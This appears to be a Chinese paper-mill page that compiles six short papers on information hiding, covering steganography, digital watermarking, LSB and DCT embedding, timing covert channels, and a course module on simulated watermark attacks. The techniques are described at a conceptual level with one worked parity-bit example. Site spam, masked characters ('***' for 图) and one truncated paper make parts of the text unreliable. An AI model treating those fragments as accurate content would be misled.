隐藏技术论文大全

隐藏技术论文篇(1)

 

一、关于信息隐藏

所谓的信息隐藏,是利用媒体信息普遍存在的冗余特性,将秘密信息隐藏在其他媒体信息中,其首要目标就是使加入隐藏信息后的媒体目标的质量下降,尽可能地小,使人无法觉察到隐藏的数据,或者知道它的存在,但未经授权者无法知道它的位置。并不像传统加密过的文件一样,看起来是一堆会激发非法拦截者破解机密资料动机的乱码,而是看起来和其它非机密性的一般资料无异,因而十分容易逃过非法拦截者的破解。其道理如同生物学上的保护色,巧妙地将自己伪装隐藏于环境中,免于被天敌发现而遭受攻击。被人们誉为历史学之父的古希腊历史学家希罗多德(Herodotus, 486―425),在其著作中讲述了这样一则故事:一个名叫Histaieus的人筹划着与他的朋友合伙发起叛乱,里应外合,以便推翻波斯人的统治。他找来一位忠诚的奴隶,剃光其头发并把消息刺在头皮上,等到头发又长起来了,把这人派出去送“信”,最后叛乱成功了。

信息隐藏技术是20世纪90年代中期从国外兴起的一门集多学科理论与技术与一身的新兴技术领域,它涉及感知科学、信息论、密码学等多个学科领域,涵盖信号处理、扩频通信、***像处理等多种专业技术的研究方向。

人的眼睛或耳朵本身对某些信息都有一定的掩蔽效应,利用人的这些特点,可以很好地将信息隐藏而不被察觉。信息隐藏过程一般由密钥来控制,通过嵌入算法将有意义的信息即嵌入对象隐藏于掩护对象中,从而生成隐密载体,隐密载体通过信道传输到接受端。在密钥的控制下采用特定的提取算法从隐藏载体中提取出嵌入对象,利用密钥从中恢复或检测出隐藏的秘密信息,从而使用户获得真实可靠的信息。使非法者不知道这个载体信息中是否隐藏了其它的信息,而且即使知道,也难以提取隐藏的信息,从而实现信息的保密。

据目前已经提出的信息隐藏算法,从它们对载体的修改方式上进行分类,可以分为:时域(空域)替换技术、变换域技术、扩展频谱技术、统计方法等等。

二、信息隐藏的特点

利用不同的媒体进行信息掩藏时有着不同的特点,但是它们都必须具有下列基本特征。

1.隐蔽性。指嵌入信息后在不引起秘密信息质量下降的前提下,不显著改变掩护对象的外部特征,即不引起人们感官上对掩护对象变化的察觉。以使非法拦截者无法判断是否有秘密信息的存在。

2.不可测性。指隐蔽载体与原始载体具有一致的特性,即非法拦截者要检测到秘密信息的存在并提取出来应相当困难,至少在秘密信息的有效期内是不可能的。

3.不可见性。利用人类视觉系统和听觉系统的属性,经过一系列隐藏处理, 使目标资料没有明显的降质现象,而隐藏的资料却无法人为地看见或听见.

4.鲁棒性。指不因***像文件的某种改动而导致隐藏信息丢失的能力。这里所谓“改动”包括传输过程中的隐藏载体对一般的信号处理(如滤波、增强、重采样、有损压缩等)、一般的几何变换(如平移、旋转、缩放、分割等)和恶意攻击等情况,即隐藏载体不会因为这些操作而丢失了隐藏的秘密信息。

5.自恢复性。论文大全。指经过了一些操作和变换后,可能会使隐蔽载体受到较大的破坏,如果只留下部分的数据,在不需要宿主信号的情况下,却仍然能恢复隐藏信息的特征就是所谓的自恢复性。

6.安全性。指隐藏算法有较强的抗攻击能力,即它必须能够承受一定程度的人为攻击,而使隐藏信息不会被破坏。

三、信息隐藏的应用

在信息安全领域中,信息隐藏技术的应用可归结为下列几个方面。

1.数字知识产权保护

知识产权保护是信息隐藏技术中数字水印技术和数字指纹技术所力***解决的重要问题,信息隐藏技术的绝大部分研究成果都是在这一应用领域中取得的。随着网络和数字技术的快速普及,通过网络向人们提供的数字服务也会越来越多,如数字***书馆、数字***书出版、数字电视、数字新闻等。这些服务提供的都是数字产品,数字产品具有易修改、易复制、易窃取的特点,因此,当前的数字知识产权保护就已经成为迫切需要解决的实际问题。

信息隐藏技术应用于版权保护时,所嵌入的签字信号通常被称作“数字水印”,数字水印技术可以成为解决此难题的一种方案。现在越来越多的视频信号、音频信号和数字***像中被贴上了不可见的标签,用以防止非法拷贝和数据跟踪。服务提供商在向用户发送产品的同时,将双方的信息代码以水印的形式隐藏在作品中,这种水印从理论上讲应该是不被破坏的。论文大全。当发现数字产品在非法传播时,可以通过提取出的水印代码追查非法散播者。其主要特点是版权保护所需嵌入的数据量小,对签字信号的安全性和鲁棒性要求很高。

2.数据完整性鉴定

使用数字水印技术有一定的缺陷,用于数字水印技术保护的媒体一旦被篡改水印就会被破坏,从而很容易被识别。在数字票据中隐藏的水印经过打印后仍然存在,可以通过再扫描回数字形式,提取防伪水印,以证实票据的真实性。数据完整性鉴定是指对某一信号的真伪或完整性的判别,并需要进一步指出该信号与原始真实信号的差别,以确认资料在网上传输或存储过程中并没有被篡改、破坏或丢失。假定接收到一个如音频、视频或***像等多媒体信号,并初步判断它很可能是某一原始真实信号的修改版本,数据篡改验证的任务就是在对原始信号的具体内容不可知的情况下,以最大的可能判断是否是真实的。首先,要充分利用数据库管理系统提供的数据完整性的约束机制和各种输入数据的引用完整性约束设计,以便保证数据完整、准确的输入和储存。其次,在数据传输过程中可视情况选用相应的数据校验方式对传输数据进行校验检查。

3.数据保密

在网络上传输秘密数据要防止非法用户的截获和使用,这是网络安全的一个重要内容,随着信息技术的发展以及经济的全球化,这一点不仅涉及***治、***事领域,还将涉及到商业、金融机密和个人隐私。信息隐藏技术为网上交流的信息采取了有效的保护,比如电子***务中敏感信息、电子商务中的秘密协议和合同、网上银行交易的重要数据、重要文件的数字签名以及个人隐私等,还可以对一些不愿为别人所知道的内容使用信息隐藏方式进行隐藏储存,从而使数据得到保密,保证了信息的安全性。论文大全。

4.资料不可抵赖性的确认

在网上交易中,交易双方的任何一方不能抵赖自己曾经做出的行为,也不能否认曾经接收到对方的信息,这是交易系统中一个重要环节。这可以使用信息隐藏技术,在交易体系的任何一方发送和接收信息时,将各自的特征标记形式加入到传递的信息中,这些标记应是不能被去除的,从而达到确认其行为的目的。

结论

总之,信息隐藏技术是多媒体通信和多媒体信号处理领域中近年来新兴的研究方向,它为信息安全提供了一种新的思路,为我们研究信息安全提供了一个新的方向.

目前国际上先进的信息隐藏技术已能做到隐藏的信息可以经受人的感觉检测和仪器的检测,并能抵抗一些人为的攻击。但总的来说,信息隐藏技术尚没有发展到可实用的阶段,使用密码加密仍是网络信息传输的主要安全手段。虽然目前对信息隐藏的研究有了很大的进展,在信息安全中起到了重要的作用,但存在大量的实际问题亟待解决,如信息隐藏的容量问题,如何建立不可感知性的数学度量模型,信息隐藏的容量上界如何计算等;信息隐藏的对立面――隐藏分析如何得到同步发展;如何对信息隐藏进行分析和分类;如何找到信息隐藏技术自己的理论依据,形成完善和科学的理论体系等等。

信息隐藏是一项崭新的技术领域,也是多媒体技术、网络技术研究的前沿,应用前景十分广阔,必将吸引广大***像、语音、网络、人工智能等领域的研究者加入到这一行列,从而推动信息安全技术更快的发展。

参考文献:

[1] 张作林,陈建华.基于区域的信息隐藏技术[J].福建电脑,2005,3.

[2] 张书真.信息安全中的信息隐藏技术[J].电脑知识与技术.2005,18.

[3] 陈 波,谭运猛,吴世忠.信息隐藏技术综述[J].计算机与数字工程.2005,2.

[4] 左伟明,秦姣华.信息隐藏技术研究[J].湖南城市学院学报.2005,3.

隐藏技术论文篇(2)

通常人们认为对信息加密就可以保证通讯的安全,但是在网络传输中仅仅使用加密技术通常是不够的。现代密码学开发出来的加解密系统不管是对称密钥系统(如des),还是安全性更高的公开密钥系统(rsa),经过加密算法处理所生成的密文具有随机性、不可读,反而明确提示了保密信息的存在,因而很容易引起监控者的注意,并以此为依据进行对密文的破译或对发送者和接收者的攻击。采用加密技术的另一个潜在缺点是随着计算机硬件的迅速发展,具有并行计算能力的破解技术的日益成熟,仅通过增加密钥长度来达到增强安全性已不再是唯一的可行方法。因此,近年来国际上出现了信息隐藏技术,它是一种不同于密码术的技术,它在电子商务中安全体系中必将起到重要作用。

一、信息隐藏技术的含义与方法

信息隐藏技术(information hiding),也称作数据隐藏(data hiding),它是集多学科理论与技术于一身的新兴技术领域。信息隐藏技术主要是指将特定的信息嵌入数字化宿主信息(如文本、数字化的声音、***像、视频信号等)中,它的目的不在于限制正常的信息存取和访问,而在于保证隐藏的信息不引起监控者的注意和重视,从而减少被攻击的可能性,在此基础上再使用密码术来加强隐藏信息的安全性,因此信息隐藏比信息加密更为安全。wWw.133229.COm应该注意到,密码术和信息隐藏技术不是互相矛盾、互相竞争的技术,而是相互补充的技术,他们的区别在于应用的场合不同,对算法的要求不同,但可能在实际应用中需要互相配合。特定的信息一般就是保密信息,信息隐藏的历史可以追溯到古老的隐写术,但推动了信息隐藏的理论和技术研究始于1996年在剑桥大学召开的国际第一届信息隐藏研究会,之后国际机构在信息隐藏领域中的隐写术、数字水印、版权标识、可视密码学等方面取得大量成果。

信息隐藏是一个十分活跃的研究领域,虽然其载体可以是文字、***像、语音或视频等不同格式的文件,但使用的方法没有本质的区别。因此,下面将以信息隐藏技术在***像中的应用即遮掩消息选用数字***像的情况为例进行说明。

在***像中应用的信息隐藏技术基本上可分为两大类:时域法或频域法。时域法就是直接改变***像元素的值,一般是在***像的亮度或色带中加入隐藏的内容。这种方法比较有代表性的是最不重要比特位(the least significant bits,lsb)方法,该方法也是最早被应用的信息隐藏方法。遮掩消息的lsb直接被待隐消息的比特位或两者之间经过某种逻辑运算的结果所代替。lsb算法的主要优点是可以实现高容量和较好的不可见性。但是该算法容易被第三方发现并得到,遭到破坏,而对***像的各种操作如压缩、剪切等,都会使算法的可靠性受到影响。为了增强算法的性能,提出了各种改进的方法,如利用伪序列,以“随机”的顺序修改***像的叠像技术(lsm);在使用密钥的情况下,才能得到正确的嵌入序列等。频域法是利用某种数学变换,将***像用频域表示,通过更改***像的某些频域系数加入待隐信息,然后再利用反变换来生成隐藏有其他信息的***像。各种不同的数学变换都可以被使用,目前已有的方法主要集中在小波变换、频率变换、dct(低频分量)变换等。

二、信息隐藏技术在电子商务中的应用

目前信息隐藏技术在电子商务中的应用主要体现在以下几个方面:

1.数据保密

在具体电子商务活动中,数据在internet上进行传输一定要防止非授权用户截获并使用,如敏感信息、谈判双方的秘密协议和合同、网上银行交易中的敏感数据信息、重要文件的数字签名和个人隐私等等。另外,还可以对一些不愿为别人所知道的内容使用信息隐藏的方式进行隐藏存储。

2.数据的不可抵赖性

在网上交易中,交易双方的任何一方不能抵赖自己曾经做出的行为,也不能否认曾经接收到的对方的信息,这是交易系统中的一个重要环节。这可以使用信息隐藏技术中的水印技术,在交易体系的任何一方发送或接收信息时,将各自的特征标记以水印的形式加入到传递的信息中,这咱水印应是不能被去除的,可达到确认其行为的目的。

3.防伪

商务活动中的各种票据的防伪也是信息隐藏技术的用武之地。在数字票据中隐藏的水印经过打印后仍然存在,可以通过再扫描回数字形式,提取防伪水印,以证实票据的真实性。

4.数据的完整性

隐藏技术论文篇(3)

网络通信的安全极为重要,早年大家是通过对网络信息的加密处理来保护信息的安全,但是随着计算机技术的不断发展破译技术已经很成熟,早年用密文加密对手段已经没有办法保证信息的安全,要知道信息一旦被破译有可能不仅仅是财产损失,很多个人信息也会无法受到保护,由此就产生了信息的隐蔽方法。

1.1隐蔽通信技术在国内外的现状与发展趋势

信息隐蔽技术是通过对信息进行处理然后通过信道进行信息的传送,就是通过载体把信息变为隐蔽信息载体。目前的隐蔽通本文由收集整理信技术研究还是基于数字认证安全和版权的认证,另一方面就是对信息的加密。早在上世纪80年代美国就信息安全问题下达过信息安全指令,而我国在1999年也下达了相同的指令,学者表示通过网络数据流来隐蔽通信技术是可以实施的,隐蔽通信技术也就此成为了研究热议的话题。

1.2网络流隐蔽通信技术的优势

网络数据不是静态的而是动态的,从出现到消失人们都难以捕捉,很多黑客也无法拦截到准确的信息,这是网络数据的优势之一,可以利用其动态的特性。

网络世界报传送的信息量是十分巨大的,每分每秒都有数以万计的网络数据包在传送,利用网络数据包来隐蔽通信技术很可行,它有自身独特的特性和优势,可以保护信息安全。

1.3隐蔽通信技术存在的问题和研究目的

传统的隐蔽通信技术很容易被检测器检测出来,只有对协议进行分析就很容易发现隐蔽信道,所以传统的隐蔽通信技术隐藏能力低。通过算法可以估计信道内信息传输量,传统的信息隐蔽技术通过数据包头可以隐蔽的信息量很少,所以隐蔽通信技术还存在信息容量小的问题。而我们研究的目的就是为了提高信息的存储量,提升信息容量的算法就是当务之急,并且研究目的也在于提高网络流对信息通讯的隐蔽性。

2隐蔽通信信道的探究

2.1时间信道的报文延迟

在tic通道中,传递符号“0”的时间为si0,传递符号“1”的时间为si1。下面我们分别从信道容量和平均传递时间两方面讨论影响信息传送的因素。在实际网络中,报文的延迟时间是变化的,从而导致了同一报文发送间隔会对应多种可能的报文到达间隔。对一发送间隔而言,到达时间间隔将分布在以该发送间隔为中心一段区域内。到达间隔分布越集中,解码中的误码率越低,信道容量就越大。

2.2隐蔽信道存在的必要条件

隐蔽信道是隐蔽在网络通信下的另一种通信方式,它

的存在就是问了实现隐蔽通信。隐蔽信道是可行的,从信息理论角度,信息的输出和输入是有着必然的联系,隐蔽信道从正常的输入端输入,隐蔽信息的接收方从正常的信道接收这样就可以实现信息的隐蔽,其中必须具备以下的条件;(1)传送放和接收方的共享资源属性和权限必须相同;(2)必须能够控制传送方和接收方之间的通信,能够调节传输的顺序;(3)必须满足时间特性双方都参考一个时钟。网络时间信道可以作为载体把传送方和接收方联系起来,传送者改变报文时间特性接收者可以第一时间检查出被改变的时间报文对其进行解读。

2.3隐蔽时间信道特性分析

计算机网络中传输的相邻报文往往是不在相同的网络环境下,所以在网络传送的时间上是有差别的,根据相邻报文的时间差来接收隐蔽的通信信息是隐蔽信息技术的有效途径之一,但是相邻报文的传送存在一定的误码率,所以要最大限度的提升信息容量,隐蔽信息技术必须提高对网络环境的抗干扰能力。信息隐藏算法中主要有两种算法,其中有空间域算法,其中最具代表性的就是lsb算法。对于扩展时间信道的容量我们必须加强对算法的研究。

隐藏技术论文篇(4)

中***分类号:TN911.73 文献标识码:A 文章编号:1007-9416(2016)12-0200-01

计算机技术的发展使得各种工作都受益于此,大大减轻了人们的工作负担,然而随着计算机的广泛应用也引起了网络安全问题。当前单纯的密码技术已经不能满足大部分的用户需求,只利用密码技术经常会使得网络信息受到泄露,因而近年来国际上发明了这种数字***像信息隐蔽技术,本文对数字***像信息隐蔽技术进行了分析,希望能为相关人士提供帮助和借鉴。

1 数字***像信息隐蔽技术发展理论

1.1 信息隐蔽技术理论

信息隐蔽技术也被称为数据隐藏,信息隐蔽技术目前并没有一个明确的定义,但是通常人们会从广义和狭义上来理解信息隐蔽技术。广义分析中来看,数据隐藏主要有将信息隐秘起来和获得版权标志两个部分,从狭义中分析来看,数据隐藏就是将通信信息以隐秘的方式进行传递[1]。当前要想研究信息隐蔽技术一般都是从狭义之中出发。

1.2 信息隐蔽分类

信息隐蔽技术可以按照不同的标准分成几种类型,具体的有以下几种:

1.2.1 载体区别

信息隐蔽通过一定的载体可以完成隐蔽技术,在计算机中最经常成为隐蔽载体的就是文档、音频、视频、***像一类的载体类型,这种按照载体区别分成的类型中最常应用的是以数字***像为代表的载体,本文主要研究的也是这种类型的信息隐蔽技术。

1.2.2 保护对象区别

按照保护对象的区别,信息隐蔽技术可以分成隐写术和数字水印。

1.2.3 嵌入域区别

这种分类是基于载体对象的划分方式,可以分为空域方法和变换域方法。第一种是利用载体对象,用代替载体对象的方式隐蔽信息,选择载体对象中不甚重要的信息***像将其与隐藏信息进行替换;第二种是是将载体对象通过正交的方式进行变换,在变换之后利用载体对象在变换过程中产生的变换空间,将隐藏信息嵌入到空间中。

1.2.4 提取区别

信息隐蔽技术可以按照提取区别将其分成盲隐藏和非忙隐藏的类型。

1.2.5 密钥区别

密钥区别是按照隐藏信息的嵌入和提取时的密钥的应用来区别的,如果在嵌入和隐藏过程中利用的是同样的密钥,这种类型为对称隐藏算法,如果在嵌入和隐藏过程中利用的是不同的密钥,这种类型为公钥信息隐藏算法[2]。

1.3 信息[蔽特性

信息隐蔽技术属于隐藏信息的技术手段,因此要想使得信息在正常读取下不受到影响需要信息隐蔽技术具备几种特性。这些特性包括不可察觉性、不可检测性、安全性、鲁棒性、自恢复性、对称性和可纠错性。不可察觉性是说在对秘密信息进行隐蔽技术后不能影响载体对象自身品质的明显改变,就是说不能让人明显发现载体的外部区别改变,因此这种不可察觉性又被称为透明性。不可检测性十分明显,就是说明在利用隐蔽技术后载体对象内的隐藏信息即使受到非法拦截,也不会被判断出隐秘信息。安全性指的是在隐藏信息技术中要具备较强抗击性,在受到外来攻击和破坏时能够保证隐秘信息不会被发现。鲁棒性是指信息隐蔽技术本身不会随着文件的改变而失去隐藏技术效果。自恢复性是指隐蔽信息技术的伪装对象会因为各种原因失去部分数据,在这个时候能够根据存留下来的信息片段恢复信息隐蔽对象。对称性与可纠错性根据名称就可以判断出其特性,对称性要求在信息的隐藏和提取两个阶段具备对称的形式,减少信息存取的困难程度,可纠错性是指隐藏信号在改变之后仍然可以恢复如初,可供人修改错误之处。

2 数字***像信息隐蔽技术的应用

数字***像隐蔽技术在应用之中会通过两个方面来进行,一方面是为了隐藏信息,即在人工和信息统计中都没有察觉的前提下将隐秘信息嵌入到各种载体之中,这种研究是为了提高信息安全保障,也是应用数字***像信息隐蔽技术的重要部分;另一方面就是能够发觉隐藏在各种载体中的隐藏信息,从中获取隐秘信息。现如今,人们对于数字***像隐蔽技术的获取隐藏信息研究方面提高了重视,当前***署中对于数字***像信息隐蔽技术的应用尤其广泛,此项分析技术的研究更加深入。当然随着互联网的发展,人民生活之中应用到数字***像信息隐蔽技术的范围也越来越广泛,在很多行业与私人领域中都扮演了重要的角色[3]。

2.1 应用于信息数据安全中

随着网络技术的发展,各种黑客技术也在不断出现,当前的电信诈骗、互联网诈骗案情频发,这就使得信息数据安全急需得到保护。合理的运用数字***像隐蔽技术,能够有效的保护个人隐私,银行网络运行以及金融行业等各个方面。

2.2 应用于版权保护之中

当前互联网中的数字作品逐渐的代替了传统纸质的作品,像***书、电影、音乐等艺术产品也逐渐的向着数字类型发展,为了保护产品在互联网流通过程中的版权,就需要获得数字***像隐蔽技术的支持,以此作为保障著作人权益的技术要点。

3 结语

在互联网大环境下,人们的个人信息安全受到威胁,其他领域的发展也受到信息安全问题的困扰,因此,要想提高网络信息安全系数需要加强对数字***像隐蔽技术的研究和应用,以此来保证网络信息安全,保障各方人士的正当权益。

参考文献

隐藏技术论文篇(5)

随着网络中信息安全事件的不断升温,网络安全教育也越来越受到高校重视。各大高校纷纷开设该类课程。本校计算机科学与技术、信息工程等专业都相继开设《网络与信息安全》、《信息安全》、《信息安全技术》等课程,普及网络安全知识,提高学生的网络安全技能,增加网络安全意识。以《网络与信息安全》课程为例,课程分配学分为4.0,采用“2+2”模式教学,其中理论2.0为课堂教学和课堂讨论课时,实验2.0为实验课时,即每周理论2节课,单周理论课时,双周讨论课,实验课每周2节课。该课程的体系结构如***1所示。[1,2]

教学过程中的基础内容

《网络与信息安全》课程分为三大模块:①网络安全基本知识概述。该模块主要讲述了网络安全的发展和现状问题,列举网络安全问题引发的各种不同影响的案例。②网络攻击技术。该模块主要讲述网络中的一些攻击现象、攻击行为以及攻击工具等。③密码学模块。该模块主要讲述古典密码学和现代密码学的一些应用,以及信息隐藏技术的一些实际作用等。④网络防护技术。该模块主要讲述网络中针对安全的一些防护措施,如防火墙、入侵监测系统等。

以信息隐藏技术为例,该部分内容在整个课程中非常重要,它将一些保密或重要的信息隐藏到另外一个可以公开的媒体之中,如把指定的信息隐藏于数字化的***像、声音或文本当中,充分利用人们的“所见即所得”的心理,来迷惑恶意的攻击者。近几年来,信息隐藏技术不断发展,越来越多地应用在生活中,如隐写术、数字水印、数字指纹、隐藏信道、阈下信道、低截获概率和匿名通信等,是目前较热的话题。[3,4]

在课程中这部分内容是整个课程的重点、难点之一,教学过程采用了比较、举例等方法,课时分配――理论教学:讨论:实验=1:1:2,理论讲授以***1中的知识框架为主线,算法原理及实现方法,讨论和实验结合中软吉大的网络信息安全系统进行教学。综合起来可以把这部分内容分为以下几部分。

1.信息隐藏位***法

位***法目前使用越来越少,但作为一种基础信息隐藏方法,仍有较高的教学应用价值。该方法作为课程中的一个基本知识点,要求学生掌握它的基本原理,并能通过一个案例,掌握主要运算过程如下:

例如,一幅24位BMP***像,文件头和***像数据由54字节组成,文件头不能隐藏信息,从第55字节开始为***像数据部分,这部分可以隐藏信息。***像数据部分是由一系列的8位二进制数所组成,因为每个8位二进制数中“1”的个数只有奇数或偶数两种可能性,因此若一个字节中“1”的个数为奇数,则称该字节为奇性字节,用“1”表示;若一个字节中“1”的个数为偶数,则称该字节为偶性字节,用“0”表示。我们用每个字节的奇偶性来表示隐藏的信息。

设一段24位BMP文件的数据为:01100110,00111100,10001111,00011010,00000000,10101011,00111110,10110000,则其字节的奇偶排序为:0,0,1,1,0,1,1,1.现在需要隐藏16进制信息4F,由于4F转化为8位二进制为01001111,将这两个数列相比较,发现第2,3,4,5位不一致,于是对这段24位BMP文件数据的某些字节的奇偶性进行调制,使其与4F转化的8位二进制相一致:第2位:将00111100变为00111101,则该字节由偶变为奇;第3位:将10001111变为10001110,则该字节由奇变为偶;第4位:将00011010变为00011011,则该字节由奇变为偶;第5位:将00000000变为00000001,则该字节由偶变为奇。

经过变化,8个字节便隐藏了一个字节的信息,这样就能很好地将信息隐藏在位***中了。当然逆向提取隐藏信息需要花费更长的时间。

2.LSB水印提取

LSB(最低有效位)算法是在位***法的基础上将输入的信号打乱,并按照一定的分配规则使嵌入的信息能够散布于***像的所有像素点上,增加破坏和修改水印的难度。水印信号嵌入模型如***2,水印信号检测模型如***3。

3.DCT变换域算法

DCT变换域算法是这一类算法的总称,在它下面的具体的算法会有一些不同。下面介绍一种基于模运算的数字水印算法。该方法将水印作为二值***像(每一像元只有两种可能的数值或者灰度等级状态的***像)进行处理,依据***像在进行DCT变换后系数的统计来选取适当的阈值,通过模处理加入水印。此算法的特点是在水印检测时不需要原始***像(如***4)。

模拟主动水印攻击教学过程

通过基础知识的学习,学生对信息隐藏技术已经有了一定的了解,为了加深记忆,使知识应用得更好,在这部分课程最后增加了一个模拟主动水印攻击的教学模块。该模块主要应用前期的知识完成。常见的水印攻击方法有:移去攻击、几何攻击、密码攻击、协议攻击(如***5)。

通过模拟攻击实验,学生对数字隐藏技术有了更深的了解,对各种算法增加了兴趣。并在课堂上针对结果展开讨论。下页***6为实验模拟攻击后的有效结果之一。

选用LSB或者DCT进行水印攻击,测试可以显示如下页***6效果。

教学成效

通过对课程中信息隐藏技术教学的改进,学生对比较难懂的数字水印部分内容有了更深一步的了解。通过改革,不仅充分调动了学生的积极性,培养了自学能力,开发了创新能力,还锻炼了学生的团队合作意识和实践能力。攻击中涉及算法的选择、操作的选择、速度的快慢,学生都能通过团队合作完成。学生在实践过程中强烈感受到了成功感和自信感。

结束语

本文以信息隐藏技术内容教学为例,阐述了三种不同的信息隐藏技术的基本知识点,分析了它们之间的关联性和区别,提高了学生的团队合作能力和创新思维的培养,加强了学生的学习兴趣。此外,本模式将教学与科研能力培养相融合,更多地引发了学生的思考。该教学模式可推广到其他课程中。

参考文献:

[1]李继芳,奚李峰,董晨.IPR―CDIO环境的计算机工程教育研究[J].计算机教育,2009(18).

[2]李继芳,奚李峰,殷伟凤,高昆.基于合作式学习的计算机导论课程教学[J].计算机教育,2008(10).

隐藏技术论文篇(6)

关键词:

信息安全技术;信息隐藏技术;原理;应用

0引言

在Internet广泛应用下,网络已经深入到我们工作生活中的各个领域。当前的电子商务对网络安全提出了更高要求,如信息安全不能得到保障,国家信息安全建设就潜在巨大安全隐患。信息隐藏技术是信息安全领域中的新兴学科,能利用人类感觉器官及多媒体信号的冗余性,将信息隐匿到其它宿主信号中,让信息不易被觉察,也不影响宿主信号的使用价值[1-2]。信息隐藏技术具备不可见性、通用性、安全性等特点,应用前景广阔。本文主要对信息隐藏技术原理、特点及在信息安全领域中的应用进行简要阐述。

1信息隐藏技术

1.1基本原理

信息隐藏技术是一种将待隐信息(密文、软件序列号、版权信息等)利用某嵌入算法隐藏至一个载体信息中,从而获得一个隐藏载体的过程[3]。在此过程中,信息隐藏的目的是要确保信息不被觉察破坏,而此过程中信息的交流存储并不受限制。在信息隐藏技术下配合密码加密能更确保信息安全性。

1.2信息隐藏技术特点

信息在不同媒体掩藏下具备不同的特点,但信息隐藏技术都具备如下基本特点:(1)隐藏性:信息嵌入之后,遮掩载体外部特征不会显著改变,秘密信息的质量也不会下降,不会让人们从感官上察觉到掩护对象的变化,让非法拦截者对是否有秘密信息不能判断。(2)不可测性:隐蔽载体同原始载体特性一致,非法拦截者要将秘密信息检测并提取出来非常困难[4]。(3)不可见性:经过隐藏处理,目标资料质量不会明显下降,对这些隐藏信息,人们不会看见,也不会听见。(4)鲁棒性:信息隐藏技术不会因***像文件出现了某种改动而让隐藏的信息丢失。我们所说的改动包括如下几方面:滤波、重采样等一般信号处理;分割、缩放、平移等一般几何变换;恶意攻击等。(5)自恢复性:隐蔽载体尽管在经过变换操作后会受到破坏,但是只要存在部分数据,就可在宿主信号缺失情况下恢复隐藏信息[5]。(6)安全性:信息隐藏技术中的隐藏算法抗攻击力强,可承受较强程度人为攻击,确保隐藏信息安全可靠。

1.3模型

我们将待隐藏信息称之为为秘密信息,将公开信息称之为载体信息,他可以是文本、***像、视频或者是音频信号。信息隐藏多由密钥来控制,密钥将秘密信息利用嵌入算法隐藏到公开信息中,隐藏载体利用通信信道进行传递,随后在检测器中利用密钥将秘密信息从隐蔽载体中进行检测或恢复.

2信息隐藏术与加密技术的关系

信息的密码技术及隐藏技术都是信息安全保障技术,但两者是有显著区别的。信息加密技术能把明文在加密算法下转换成密文并利用公开信道传送至接收者的手中,非授权者能意识到保密信息存在,但却不能获知信息具体内容。信息隐藏技术下攻击者则不能对保密信息进行直观判断。两种技术不是相互竞争、相互矛盾的,是相互补充的,如果在信息隐藏技术中融入加密技术,那么信息在数据传输的过程中会达到理论上的一个最高的安全级别。

3信息隐藏的常用技术

3.1替换技术

替换就是指的是用秘密信息将伪装载体内的不重要部分替换掉,并对秘密信息进行编码的一种技术,属于空间域操作,将适合的伪装载体嵌入到适当区域,确保数据失真度保持在人的视觉允许的范围之内。这种技术算法简单,但不能抵抗***像压缩、尺寸变化等攻击,鲁棒性较差。

3.2变换技术

变换技术主要包括离散小波变换(DWT)、离散余弦变换(DCT)及离散傅利叶变换(DFT)等,每个技术都具有自身特点,DWT可对***像进行多空间、多尺度、多频率分解,可将输入信号分解成系列低分辨率细节信号;DCT能让空间域内能量重新分布,***像相关性降低;DFT能将***像分割为多个感觉的频段,让秘密信息能选择更适合部分去嵌入。这种技术鲁棒性较好,可抵抗压缩、噪音等的攻击。

3.3扩频技术

扩频技术指的是将一个比特多次嵌入到伪装载体中,让隐藏的信息在过滤之后仍能保留。这种技术尽管传输率差,但是实际应用中,在随机码下能使载有信息数据的基带信号频谱扩展,让信号变成宽带低功率谱密度的信号。其中,跳频扩频、直序扩频最为典型。且这种技术检测只需盲检,即使传输中受到乘性、加性噪音攻击,隐藏信息也不会丢失。

4信息安全技术中信息隐藏技术的应用

4.1对数字知识产权进行保护对数字知识产权进行保护是将数字指纹技术及数字水印技术来解决信息隐藏技术中所遇到的问题[6]。信息隐藏技术利用“数字

水印”在数字知识信息中嵌入签字信号,对数字知识进行产权保护。通过信息隐藏技术可将音频信号、视频信号机数字***像中嵌入不可见的信号标签,可防止攻击者对其进行数据跟踪及非法拷贝。为确保数字信息安全,服务商向用户发送产品同时可在作品中以水印形式将双方信息代码隐藏其中,一旦数字产品出现非法传播,能够利用水印代码对非法散播者进行追查。信息隐藏技术对数字知识产权进行保护中数据嵌入量小,因此对签字信号鲁棒性及安全性都要求很高。数字水印技术在使用中有一定缺陷,一旦所保护媒体被篡改,水印就会被破坏,信息就变得容易识别。而对数字票据来说就不会出现这种情况,数据票据中的隐藏水印在打印之后仍是存在的,因此对于数据票据可以利用对数据进行扫描这一形式对防伪隐藏水印进行提取,以此来判断票据真实与否。

4.2对数据完整性进行鉴定

所谓的数据完整性鉴定指的是对信号完整性及真伪进行判别,指出信号同原始信号间的差别,借此确认信息在传输及存储过程中有没有被破坏、篡改。如果接收到音频、视频等多媒体形式的信号,需对信号原始式进行判断,看信号是否为某一真实信号的修改版本,并要对原始信号内容进行是否真实性的判断[7]。要完成这种鉴定需首先在数据库的管理系统中输入各种完整数据,并制定相应的约束机制,这样才能确保数据在输入及存储过程中的完整性。其次,如数据传输可视的情况下,可以采用数据校验的方式对这些数据进行检测。

4.3对数据进行保密

网络上进行秘密数据传输的过程中最重要的就是要防止一些非法用户将其截获及使用,确保数据安全也是信息安全技术的一个主要内容。随经济全球化,电子信息技术得到了飞速发展,已经涉及到国家***事、***治、金融、商业等众多领域,关系到国家安全及个人隐私。而信息隐藏技术就是要确保网上交流信息的安全性,为信息数据进行保密。例如网上银行的交易数据,电子商务的秘密合同,电子***务的敏感信息,重要文件的数字签名等等都可以利用网络隐藏技术进行保护。除此之外,信息隐藏技术还能够将不愿让人知道的信息内容采用隐藏方式来存储,让数据更为隐匿,保密性更强,信息也更为安全。

4.4对资料不可抵赖性进行确认

网上交易的过程中,参与交易的任何一方对自己的行为都不能抵赖,对于曾接收过、接收到了对方信息也不能否认,这是确保网上交易安全的一个重要环节。在交易系统中应用信息隐藏技术之后,交易体系下的任何一方在接收及发送信息时就可以将自身独特的标记隐藏到传递的信息中,这些隐藏的标记不能被清除,从而能够确保交易过程中任何一方都不能对自己行为进行抵赖[8]。

5结语

综上所述,信息隐藏技术为多媒体信号处理及多媒体通信领域内的一个新兴研究方向,信息隐藏技术能为多媒体信息安全提供新思路。当前国际上的信息隐藏技术可以做到将隐藏信息进行仪器检测,抵抗人为攻击,但是还没有发展到可以实用的阶段,今后将密码技术同信息隐藏技术有机结合,建立不可感知性的数学度量模型,有效进行信息隐藏容量上界的计算,是今后信息隐藏技术需要努力的方向。

作者:李蟾膺 单位:民航西南空管局

参考文献:

